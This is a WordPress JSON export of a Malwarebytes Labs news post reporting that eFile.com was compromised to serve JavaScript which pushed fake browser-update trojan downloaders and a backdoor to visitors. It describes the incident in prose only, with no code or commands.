{"id":21689,"date":"2023-04-06T16:11:55","date_gmt":"2023-04-07T00:11:55","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2023\/04\/06\/news-15420\/"},"modified":"2023-04-06T16:11:55","modified_gmt":"2023-04-07T00:11:55","slug":"news-15420","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2023\/04\/06\/news-15420\/","title":{"rendered":"Visitors of tax return e-file service may have downloaded malware"},"content":{"rendered":"<p>The IRS-authorized electronic filing service for tax returns, eFile.com, has been caught serving a couple of malicious JavaScript (JS) files these past few weeks, according to several security researchers and&nbsp;<a rel=\"noreferrer noopener\" href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/irs-authorized-efilecom-tax-return-software-caught-serving-js-malware\/\" target=\"_blank\">corroborated<\/a>&nbsp;by BleepingComputer. Note this security incident only concerns eFile.com, not the&nbsp;<a rel=\"noreferrer noopener\" href=\"https:\/\/en.wikipedia.org\/wiki\/IRS_e-file\" target=\"_blank\">IRS&#8217; e-file infrastructure<\/a>&nbsp;and other similar-sounding domains.<\/p>\n<p>As of this writing, eFile.com is clean. Users can access it without worry.<\/p>\n<h2>The attack began 18 days ago<\/h2>\n<p>The incident first arose as a possibility that something might be up with the website. A Reddit user&nbsp;<a rel=\"noreferrer noopener\" href=\"https:\/\/www.reddit.com\/r\/Scams\/comments\/11tx8pj\/possible_fake_website_network_error\/\" target=\"_blank\">encountered<\/a>&nbsp;a fake &#8220;Network Error&#8221; page when accessing&nbsp;<a href=\"www.efile.com.\">www.efile.com<\/a><em><a href=\"www.efile.com.\">.<\/a><\/em> The page, as shown below, informed visitors their browser &#8220;uses an unsupported protocol,&#8221; and that they need to click the link it provided to them to update their browser&mdash;a known tactic often used by scammers.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.malwarebytes.com\/blog\/news\/2023\/04\/easset_upload_file230_262787_e.png\" alt=\"\" width=\"833\" height=\"543\" style=\"display: block; margin-left: auto; margin-right: auto;\" \/><\/p>\n<p style=\"text-align: center;\">This fake error message used to come up when visiting the domain. Uncharacteristically, it told visitors to update their browsers. This made Redditors suspect the domain was hijacked. (Source:&nbsp;<a rel=\"noreferrer noopener\" href=\"https:\/\/www.reddit.com\/user\/SaltyPotter\/\" target=\"_blank\">\/u\/SaltyPotter<\/a>, original image cropped to fit)<\/p>\n<p>This, however, is no scam.<\/p>\n<p>Known figures in cybersecurity, such as MalwareHunterTeam (<a target=\"_blank\" href=\"https:\/\/twitter.com\/malwrhunterteam\" rel=\"noreferrer noopener\">@malwarehunterteam<\/a>) and Johannes Ullrich (<a target=\"_blank\" href=\"https:\/\/twitter.com\/johullrich\" rel=\"noreferrer noopener\">@johullrich<\/a>) of SANS, caught wind of the potential site compromise and dug in, with each writing their analysis.<\/p>\n<p>According to both&nbsp;<a target=\"_blank\" href=\"https:\/\/twitter.com\/malwrhunterteam\/status\/1642988428080865281\" rel=\"noreferrer noopener\">MalwareHunterTeam<\/a>&nbsp;and&nbsp;<a target=\"_blank\" href=\"https:\/\/isc.sans.edu\/diary\/Supply+Chain+Compromise+or+False+Positive+The+Intriguing+Case+of+efilecom+updated+confirmed+malicious+code\/29708\" rel=\"noreferrer noopener\">Ullrich<\/a>, a malformed JS file named&nbsp;<em>popper.js<\/em>&nbsp;contains encrypted malicious code&mdash;meaning it cannot be read plainly. Its purpose is to load another JS script called&nbsp;<em>update.js<\/em>&nbsp;hosted on an Amazon Web Services (AWS) site.&nbsp;<em>update.js<\/em>&nbsp;contains code used to display the fake error page.<\/p>\n<p><em>popper.js<\/em>&nbsp;is a legitimate file modified to do malicious tasks. Because almost every page within the eForm website loads it, the malicious activities we mentioned are triggered every time a user visits any site page.<\/p>\n<p><em>update.js<\/em>&nbsp;also contains two hard-coded download URLs, both served on the malicious domain&nbsp;<em>infoamanewonliag[.]online<\/em>. The two payloads are for two specific browsers visitors typically use, Chrome and Firefox.<\/p>\n<p>&#8220;So different browsers get different payloads,&#8221; says Ullrich. Chrome users get a payload named &#8220;update.exe&#8221; with a valid signature from Sichuan Niurui Science and Technology. Firefox users get &#8220;installer.exe.&#8221; There is no indication if browsers based on Chromium (where Chrome is based) or Quantum (where Firefox is based) could also receive the payloads.<\/p>\n<p>BleepingComputer&nbsp;<a target=\"_blank\" href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/irs-authorized-efilecom-tax-return-software-caught-serving-js-malware\/\" rel=\"noreferrer noopener\">has independently confirmed<\/a>&nbsp;the payloads connect to an IP address hosted by Alibaba in China. The same IP also hosts the illicit domain the payloads were downloaded from.<\/p>\n<p>These executables were written in Python. Malwarebytes detects them as&nbsp;<strong>Trojan.Downloader.Python<\/strong>.<\/p>\n<p>As of Wednesday,&nbsp;<em>popper.js<\/em>&nbsp;is free of malicious code.<\/p>\n<h2>The backdoor<\/h2>\n<p>Once users execute the payload, a PHP script runs quietly in the background. BleepingComputer&#8217;s analysis shows that every 10 seconds, the backdoor script connects to a remote&nbsp;<a target=\"_blank\" href=\"https:\/\/www.malwarebytes.com\/glossary\/cc\" rel=\"noreferrer noopener\">command and control (C2)<\/a>&nbsp;server to receive one or more tasks to perform on the affected system. These include &#8220;executing a command and sending its output back to the attackers or downloading additional files onto the computer.&#8221;<\/p>\n<p>The backdoor is unsophisticated, but it&#8217;s enough to give attackers access to the entire system, including company-owned devices.<\/p>\n<p>&#8220;The full scope of this incident, including if the attack successfully infected any eFile.com visitors and customers, remains yet to be learned,&#8221; says BleepingComputer.<\/p>\n<hr \/>\n<p dir=\"ltr\">Malwarebytes removes all remnants of ransomware and&nbsp;prevents&nbsp;you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.<\/p>\n<p style=\"text-align: center;\"><span class=\"blue-cta-bttn\" style=\"background-color: #0d3ecc; line-height: 50px; padding: 0 20px;\"><a href=\"https:\/\/www.malwarebytes.com\/business\/contact-us\/\">TRY NOW<\/a><\/span><\/p>\n<p><a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2023\/04\/visitors-of-tax-return-e-file-service-may-have-downloaded-malware\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<table cellpadding=\"10\">\n<tr>\n<td valign=\"top\" align=\"left\">\n<p>Categories: <a href=\"https:\/\/www.malwarebytes.com\/blog\/category\/news\" rel=\"category tag\">News<\/a><\/p>\n<p>Categories: <a href=\"https:\/\/www.malwarebytes.com\/blog\/category\/scams\" rel=\"category tag\">Scams<\/a><\/p>\n<p>Tags: tax scams<\/p>\n<p>Tags:  efile.com<\/p>\n<p>Tags:  US tax 2023<\/p>\n<p>Tags:  backdoor<\/p>\n<p>Tags:  Trojan<\/p>\n<p>Tags:  Johannes Ullrich<\/p>\n<p>Tags:  MalwareHunterTeam<\/p>\n<p>Tags:  \/u\/SaltyPotter<\/p>\n<p>Tags:  fake network error notification<\/p>\n<p>Cybercriminals have compromised eFile.com to host malicious code that allows for the download of Trojans.<\/p>\n<table width=\"100%\">\n<tr>\n<td align=\"right\">\n<p><b>(<a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2023\/04\/visitors-of-tax-return-e-file-service-may-have-downloaded-malware\" title=\"Visitors of tax return e-file service may have downloaded malware\">Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2023\/04\/visitors-of-tax-return-e-file-service-may-have-downloaded-malware\">Visitors of tax return e-file service may have downloaded malware<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/www.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[29056,10836,29053,29057,26013,29055,32,10574,24380,10833,29054],"class_list":["post-21689","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-u-saltypotter","tag-backdoor","tag-efile-com","tag-fake-network-error-notification","tag-johannes-ullrich","tag-malwarehunterteam","tag-news","tag-scams","tag-tax-scams","tag-trojan","tag-us-tax-2023"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/21689","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=21689"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/21689\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=21689"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=21689"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=21689"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}